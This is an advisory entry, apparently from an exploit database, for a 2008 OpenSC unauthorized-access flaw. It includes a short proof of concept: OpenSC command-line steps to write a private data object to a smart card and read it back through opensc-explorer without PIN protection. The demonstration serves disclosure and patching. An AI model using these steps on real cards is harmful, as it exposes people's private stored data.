OpenSC Unauthorized Access Vulnerability

vendor:

OpenSC

by:

SecurityFocus

7.5

CVSS

HIGH

Unauthorized Access

287

CWE

Product Name: OpenSC

Affected Version From: OpenSC 0.11.6 and below

Affected Version To: OpenSC 0.11.7

Patch Exists: YES

Related CWE: N/A

CPE: a:opensc:opensc

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

OpenSC Unauthorized Access Vulnerability

Attackers can exploit this issue to gain unauthorized access to private data, which may lead to other attacks. A proof of concept is available which involves creating a file with a secret, initializing a blank card, writing a private data object to the card, and using low-level tools to access the object.

Mitigation:

Users should upgrade to the latest version of OpenSC.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/33922/info

OpenSC is prone to an unauthorized-access vulnerability.

Attackers can exploit this issue to gain unauthorized access to private data, which may lead to other attacks.

Versions prior to OpenSC 0.11.7 are vulnerable. 

The following proof of concept is available:

create a file with a secret:
echo "This is my secret data" > secret-file

To initialise a blank card:
pkcs15-init --create-pkcs15 --use-default-transport-keys --profile pkcs15+onepin --pin 123456 --puk 78907890

To write a private data object to the card:
pkcs11-tool --label "my secret" --type data --write-object secret-file
--private --login --pin 12345

To see all objects on the card:
pkcs15-tool --dump
This will list the data object, including the path it is stored, e.g.:
"Path: 3f0050154701"

To access such an object with low-level tools:

opensc-explorer
cd 5015
get 4701